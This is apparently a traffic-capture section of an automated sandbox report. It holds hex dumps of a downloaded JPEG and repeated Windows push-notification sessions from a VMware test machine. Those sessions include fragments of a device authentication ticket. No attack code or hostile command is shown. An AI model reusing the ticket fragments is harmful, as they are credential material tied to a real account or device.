            2024-09-29 02:32:46 UTC15858INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 02 64 05 55 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
            Data Ascii: JFIFHHCCdU"}!1AQa"q2
            2024-09-29 02:32:46 UTC16384INData Raw: 47 b8 f2 b4 24 2d 46 fd f0 07 4c 50 1d a3 18 e3 8a 72 ae de 9f ca 81 18 6e d4 a5 b0 6a 0c 0b 0e 94 dd ad e9 fa d4 ea 70 83 e9 49 90 4f 6a 9b b2 90 c0 30 07 1f 8e 69 68 27 9a 17 69 f4 eb 40 6e 0b f3 9e 29 a5 f0 69 73 8c e2 90 a6 69 a4 02 16 c8 a4 0d b4 d0 41 cf ff 00 5a 85 5c fd ea ae 54 4e bb b0 24 f3 46 33 4a 51 4a d2 61 89 e0 d2 71 ec 50 e5 8c 1a 69 4d 83 f4 a3 91 fc 46 8a 39 59 3c c1 4c 30 a9 ed 4f a6 c9 d2 84 98 73 11 98 39 e3 14 88 98 39 e2 a5 4c e3 ab 54 7b 78 fe 2a a0 e6 12 4e 5b f0 a4 0a 71 da 9d b3 77 f7 8d 3b 1c 77 a0 5d 46 79 6d ed 48 f1 9d 87 a5 3f 6f b9 a3 6f 1f c5 40 f4 12 13 f2 e3 d2 9d 49 b6 8d be e6 80 e6 06 6d a2 98 a7 0e 5b d6 89 13 38 ea 69 36 7f bd 40 73 21 f2 9e 07 d6 9a 29 0a e7 fb d4 98 c7 ad 05 c6 48 0a b1 e8 71 48 15 bf bd 4b 8f
            Data Ascii: G$-FLPrnjpIOj0ih'i@n)isiAZ\TN$F3JQJaqPiMF9Y<L0Os99LT{x*N[qw;w]FymH?oo@Im[8i6@s!)HqHK
            2024-09-29 02:32:46 UTC16384INData Raw: df 13 ff 00 60 4f 19 fc 50 d3 bc 61 aa 7c 29 d3 bc 33 ad 45 a7 4d a6 78 3f c0 9a f6 b3 a9 58 e8 73 af 9e 25 9c a6 a8 5e 68 4c cb b7 91 23 07 31 9e 00 41 5f 5d fe d3 df b2 4f c3 7f db 3b e1 9c 9e 0f f8 a1 e1 1d 2f c6 1e 1f 79 44 e9 6f 78 19 5e de 50 08 12 45 2c 65 64 86 4c 16 1b e3 65 6c 31 19 c1 22 b0 3f 63 cf f8 27 ef c1 ef d8 13 c3 9a ae 95 f0 8f c1 36 7e 0f b4 d7 25 49 f5 03 1d dd cd e4 d7 6c 81 82 6f 96 e2 49 24 21 77 36 17 76 06 e3 81 c9 ab c3 d4 94 14 b9 9e ae fa ef cd 77 a5 ff 00 c2 b4 5b ec ac 91 18 88 a9 f2 f2 ec ad a6 d6 6b 76 bf c4 f5 7b 6e f5 68 f6 4a 28 a2 a0 a0 a2 8a 28 00 a2 8a 28 03 f2 57 f6 9d e7 e3 8e b5 f4 b7 ff 00 d2 78 ab 81 da 4d 7a 07 ed 34 31 f1 c3 5a fa 5b ff 00 e9 3c 55 c1 d7 eb 19 4f fb 8d 1f f0 47 f2 47 2e 23 f8 b2 f5 7f 98 df
            Data Ascii: `OPa|)3EMx?Xs%^hL#1A_]O;/yDox^PE,edLel1"?c'6~%IloI$!w6vw[kv{nhJ(((WxMz41Z[<UOGG.#
            2024-09-29 02:32:46 UTC16384INData Raw: 7e 35 e9 df 64 f8 77 fb 62 fc 31 b5 b8 9a df 48 f1 66 85 74 ab 2c 7b f0 d2 5a b9 00 e3 20 ef 86 40 38 20 10 c3 a5 79 cb 89 71 8b 05 46 b5 5b d9 b9 29 4a 29 5f 4b 5a d7 5c a9 eb db 5b 69 63 5f ab 43 9d a5 f2 47 e7 cf 8a 3f 62 b8 fc 1d f1 63 c0 3a 5d d7 8d 3c 3f a8 f8 5f c7 d3 95 b3 d6 ec d8 ec 31 a1 40 e3 1f 30 de db d5 13 0c 41 66 19 c6 0d 7d 35 fb 69 fc 1d 97 e1 cd df c3 df 14 68 3e 38 d2 3c 03 a0 f8 1c a5 9d 95 85 f0 9f ec 82 65 cb a9 55 84 31 76 78 d5 91 c3 0c b2 af 5f 98 e7 ce 7f 68 cf d9 27 fe 19 c7 e2 9f c2 b9 b4 2d 52 fa eb c1 77 1e 2c 81 20 d3 ef 24 12 36 99 77 2c b0 b3 94 6c 02 c9 22 c2 3a f2 0a 77 dd 9a f5 cf f8 2a b5 80 d5 bf 67 bd 0a cd 99 54 5d f8 a6 ca 02 49 da 00 68 e7 5c e7 b7 5e b5 75 f1 d3 c4 e2 70 8d 54 e6 8c b9 93 d1 77 69 dd 34 d5 ed
            Data Ascii: ~5dwb1Hft,{Z @8 yqF[)J)_KZ\[ic_CG?bc:]<?_1@0Af}5ih>8<eU1vx_h'-Rw, $6w,l":w*gT]Ih\^upTwi4
            2024-09-29 02:32:46 UTC16384INData Raw: 7c 36 d1 fe 11 c3 f1 02 f3 e2 17 81 ed 7c 07 71 b4 c5 e2 49 b5 db 58 f4 89 77 36 d5 db 74 5f c9 39 60 40 c3 72 78 eb 5f 2e fc 48 ff 00 82 d7 78 27 c1 7e 1b d5 e7 b6 97 e1 e7 db 9b e2 07 fc 21 1e 1d 7d 63 c7 b6 da 5e 95 ad 5b 8b 4b 6b b7 d5 de ef c9 93 c9 b4 44 b8 50 cd 1c 73 8d c6 21 9f de 8c 72 7e 14 fd 91 be 28 78 17 c7 3e 1d f8 b5 37 c3 56 d5 23 83 e2 6e bb e3 49 3e 19 d9 6a ba 6f db 34 68 2f f4 e8 ac a1 b8 8a 49 65 8e c5 ef 63 92 29 2e 1d 45 c0 40 6f 66 d9 23 30 05 ad 7c 0c fd 8f 3e 25 69 7a a4 7a a5 f7 c3 cb 5f 07 c7 7f fb 42 bf c4 46 d2 e0 d4 ec a6 16 1a 44 ba 41 88 cc c6 29 36 19 04 ec 55 e3 4d c7 7e f2 bb d3 12 35 d2 8f 35 58 a9 68 9f 25 fc 9c a7 4b 99 5f af 2c 65 3b b5 a5 93 7a 35 78 aa 92 e5 83 6b 56 9c ed e6 94 6a f2 bb 74 bb 8c 1a 4f 5b c9 2d
            Data Ascii: |6|qIXw6t_9`@rx_.Hx'~!}c^[KkDPs!r~(x>7V#nI>jo4h/Iec).E@of#0|>%izz_BFDA)6UM~55Xh%K_,e;z5xkVjtO[-
            2024-09-29 02:32:46 UTC16384INData Raw: 2d f5 2f 36 37 b2 b9 29 b1 99 24 89 95 8a 32 80 1a 33 90 d8 ed 93 9d 7f 0d 7e d7 3e 2e f0 d7 c6 dd 53 c7 d1 b6 9f 2e b5 ab 5b 3d 9c 91 34 25 6d 62 88 aa 88 d1 11 48 c2 c7 e5 c6 54 12 7e ef 39 24 93 e6 1d e8 a2 79 7e 1e 6e 4e 50 4f 9a e9 ef 6d 6d 7d 36 57 b2 bd ad 76 93 61 ed a4 ad 66 76 17 df 1c f5 dd 43 e0 2c 7f 0e e4 68 0e 89 1e a8 fa a1 94 03 f6 87 77 dc c5 09 ce dd 9e 63 b4 9d 33 b8 f5 ad 69 ff 00 69 ad 6a e3 e3 5d c7 8e 9b 4f d2 46 a7 71 a7 9d 34 c0 16 4f b3 84 36 9f 65 dc 06 ed d9 db cf 5c 67 da bc df bf e3 4e c7 15 5f 51 c3 eb ee 2d 6f 7f 3e 6b 73 7d f6 57 f4 0f 6b 25 6d 7b 7e 07 41 f0 77 e2 66 a3 f0 4b e2 2e 8f e2 5d 25 61 96 fb 47 66 28 93 82 63 99 59 1a 36 56 da 41 c1 56 23 8c 7a d6 e2 fe d1 be 22 3f 0f 7c 65 e1 b6 fb 24 96 7e 38 d4 bf b5 2f e5
            Data Ascii: -/67)$23~>.S.[=4%mbHT~9$y~nNPOmm}6WvafvC,hwc3iij]OFq4O6e\gN_Q-o>ks}Wk%m{~AwfK.]%aGf(cY6VAV#z"?|e$~8/
            2024-09-29 02:32:46 UTC16384INData Raw: 50 ab 8a 18 05 ef 4d de 0a d2 65 7b 83 46 c3 e9 a0 ac df 25 08 79 a0 0c 0e 94 a3 ad 2b 8b 99 ec 28 a2 93 38 a5 aa 2d bb 2b 85 07 ad 1d 68 a0 4a ec dc f8 65 ff 00 25 27 c3 df f6 13 b6 ff 00 d1 ab 5f af 95 f9 05 f0 c9 f1 f1 2b c3 df f6 13 b6 ff 00 d1 ab 5f af b5 f9 cf 19 ab 57 a7 e9 fa 9d b4 7e 0f 98 51 45 15 f1 a6 a1 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 07 e5 3f ed 18 37 7c 69 d5 fe 90 7f e9 3c 75 c6 aa 85 ae d3 f6 8b 52 df 19 35 8c 7a 41 ff 00 a2 23 ae 2e 21 b0 73 de bf 63 c9 ff 00 dc 28 7f 82 3f fa 4a 38 31 5f c5 97 ab 24 8f a9 a7 a7 56 a4 03 26 a4 8d 38 5a f4 e3 dc e6 1d 1f 53 4f 55 0c 3f fa f4 94 01 93
            Data Ascii: PMe{F%y+(8-+hJe%'_+_W~QEEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEP?7|i<uR5zA#.!sc(?J81_$V&8ZSOU?
            2024-09-29 02:32:46 UTC3297INData Raw: 52 da 5a 1e 7e 32 9f 32 b9 f5 94 7c 3a fd 6a c5 53 d3 6e 56 f2 25 91 7a 70 6a e5 7e ab 4f 63 c4 7a 05 14 51 56 20 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 02 c5 14 51 5f 1e 7b 81 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 00 4e 05 54 bc b9 5b 28 64 9a 4c f9 71 8d e7 1e d5 69 ce 10 fd 2b 92 f8 d3 e2 56 f0 7f c3 0d 6b 54 44 f3 1a ca d5 e5 db ea 02 93 fe 15 9d 49 59 36 17 4b
            Data Ascii: RZ~22|:jSnV%zpj~OczQV ((((((((((((((((((((((((Q_{EPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPNT[(dLqi+VkTDIY6K


            Session IDSource IPSource PortDestination IPDestination Port
            19192.168.2.64974240.113.110.67443
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:47 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 50 51 6a 6f 53 43 52 45 4e 45 6d 44 6e 36 72 70 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 38 66 32 61 31 34 64 64 62 37 34 62 32 66 36 0d 0a 0d 0a
            Data Ascii: CNT 1 CON 305MS-CV: PQjoSCRENEmDn6rp.1Context: a8f2a14ddb74b2f6
            2024-09-29 02:32:47 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
            2024-09-29 02:32:47 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 50 51 6a 6f 53 43 52 45 4e 45 6d 44 6e 36 72 70 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 38 66 32 61 31 34 64 64 62 37 34 62 32 66 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 51 77 45 77 70 55 58 6e 4a 75 4a 48 61 46 43 46 64 44 4b 71 72 74 7a 61 37 68 65 33 74 46 5a 6a 78 64 61 38 61 2f 46 5a 42 30 2f 2b 50 41 63 47 63 77 4f 45 71 67 4b 6a 49 56 4d 61 57 6a 50 6e 63 65 6e 66 53 72 73 72 46 72 54 51 55 56 71 76 79 70 43 42 6a 35 53 75 4f 62 37 68 4b 36 70 68 70 37 55 58 78 38 37 64 35 6e 67 51
            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: PQjoSCRENEmDn6rp.2Context: a8f2a14ddb74b2f6<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUQwEwpUXnJuJHaFCFdDKqrtza7he3tFZjxda8a/FZB0/+PAcGcwOEqgKjIVMaWjPncenfSrsrFrTQUVqvypCBj5SuOb7hK6php7UXx87d5ngQ
            2024-09-29 02:32:47 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 50 51 6a 6f 53 43 52 45 4e 45 6d 44 6e 36 72 70 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 38 66 32 61 31 34 64 64 62 37 34 62 32 66 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
            Data Ascii: BND 3 CON\WNS 0 197MS-CV: PQjoSCRENEmDn6rp.3Context: a8f2a14ddb74b2f6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
            2024-09-29 02:32:47 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
            Data Ascii: 202 1 CON 58
            2024-09-29 02:32:47 UTC58INData Raw: 4d 53 2d 43 56 3a 20 50 64 6c 54 4a 70 52 2b 69 45 43 57 68 2b 66 50 32 4f 35 54 46 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
            Data Ascii: MS-CV: PdlTJpR+iECWh+fP2O5TFA.0Payload parsing failed.


            Session IDSource IPSource PortDestination IPDestination Port
            20192.168.2.64974840.113.110.67443
            TimestampBytes transferredDirectionData
            2024-09-29 02:33:00 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6e 33 57 43 2b 67 36 2f 72 6b 69 6e 6f 4a 71 69 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 66 37 35 34 63 65 61 64 31 30 65 32 66 38 0d 0a 0d 0a
            Data Ascii: CNT 1 CON 305MS-CV: n3WC+g6/rkinoJqi.1Context: 11f754cead10e2f8
            2024-09-29 02:33:00 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
            2024-09-29 02:33:00 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6e 33 57 43 2b 67 36 2f 72 6b 69 6e 6f 4a 71 69 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 66 37 35 34 63 65 61 64 31 30 65 32 66 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 51 77 45 77 70 55 58 6e 4a 75 4a 48 61 46 43 46 64 44 4b 71 72 74 7a 61 37 68 65 33 74 46 5a 6a 78 64 61 38 61 2f 46 5a 42 30 2f 2b 50 41 63 47 63 77 4f 45 71 67 4b 6a 49 56 4d 61 57 6a 50 6e 63 65 6e 66 53 72 73 72 46 72 54 51 55 56 71 76 79 70 43 42 6a 35 53 75 4f 62 37 68 4b 36 70 68 70 37 55 58 78 38 37 64 35 6e 67 51
            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: n3WC+g6/rkinoJqi.2Context: 11f754cead10e2f8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUQwEwpUXnJuJHaFCFdDKqrtza7he3tFZjxda8a/FZB0/+PAcGcwOEqgKjIVMaWjPncenfSrsrFrTQUVqvypCBj5SuOb7hK6php7UXx87d5ngQ
            2024-09-29 02:33:00 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6e 33 57 43 2b 67 36 2f 72 6b 69 6e 6f 4a 71 69 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 66 37 35 34 63 65 61 64 31 30 65 32 66 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
            Data Ascii: BND 3 CON\WNS 0 197MS-CV: n3WC+g6/rkinoJqi.3Context: 11f754cead10e2f8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
            2024-09-29 02:33:00 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
            Data Ascii: 202 1 CON 58
            2024-09-29 02:33:00 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4a 74 34 42 73 64 4e 6b 31 30 6d 2b 79 43 4c 43 34 75 37 55 6f 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
            Data Ascii: MS-CV: Jt4BsdNk10m+yCLC4u7UoA.0Payload parsing failed.


            Session IDSource IPSource PortDestination IPDestination Port
            21192.168.2.64975040.113.110.67443
            TimestampBytes transferredDirectionData
            2024-09-29 02:33:22 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 39 49 42 48 68 30 44 44 6f 45 75 6e 6b 67 71 71 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 61 36 64 30 61 61 32 33 36 30 31 37 65 38 62 0d 0a 0d 0a
            Data Ascii: CNT 1 CON 305MS-CV: 9IBHh0DDoEunkgqq.1Context: ba6d0aa236017e8b
            2024-09-29 02:33:22 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
            2024-09-29 02:33:22 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 39 49 42 48 68 30 44 44 6f 45 75 6e 6b 67 71 71 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 61 36 64 30 61 61 32 33 36 30 31 37 65 38 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 51 77 45 77 70 55 58 6e 4a 75 4a 48 61 46 43 46 64 44 4b 71 72 74 7a 61 37 68 65 33 74 46 5a 6a 78 64 61 38 61 2f 46 5a 42 30 2f 2b 50 41 63 47 63 77 4f 45 71 67 4b 6a 49 56 4d 61 57 6a 50 6e 63 65 6e 66 53 72 73 72 46 72 54 51 55 56 71 76 79 70 43 42 6a 35 53 75 4f 62 37 68 4b 36 70 68 70 37 55 58 78 38 37 64 35 6e 67 51
            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 9IBHh0DDoEunkgqq.2Context: ba6d0aa236017e8b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUQwEwpUXnJuJHaFCFdDKqrtza7he3tFZjxda8a/FZB0/+PAcGcwOEqgKjIVMaWjPncenfSrsrFrTQUVqvypCBj5SuOb7hK6php7UXx87d5ngQ
            2024-09-29 02:33:22 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 39 49 42 48 68 30 44 44 6f 45 75 6e 6b 67 71 71 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 61 36 64 30 61 61 32 33 36 30 31 37 65 38 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
            Data Ascii: BND 3 CON\WNS 0 197MS-CV: 9IBHh0DDoEunkgqq.3Context: ba6d0aa236017e8b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
            2024-09-29 02:33:22 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
            Data Ascii: 202 1 CON 58
            2024-09-29 02:33:22 UTC58INData Raw: 4d 53 2d 43 56 3a 20 39 2f 4a 57 4f 6c 57 57 78 45 36 35 33 63 31 37 38 4e 6a 59 47 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
            Data Ascii: MS-CV: 9/JWOlWWxE653c178NjYGg.0Payload parsing failed.


            Session IDSource IPSource PortDestination IPDestination Port
            22192.168.2.64975440.113.110.67443
            TimestampBytes transferredDirectionData
            2024-09-29 02:33:44 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 34 46 64 46 2f 4a 37 53 76 30 57 32 58 56 38 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 63 65 36 32 39 65 61 38 36 38 63 35 63 35 38 0d 0a 0d 0a
            Data Ascii: CNT 1 CON 305MS-CV: 4FdF/J7Sv0W2XV8/.1Context: bce629ea868c5c58
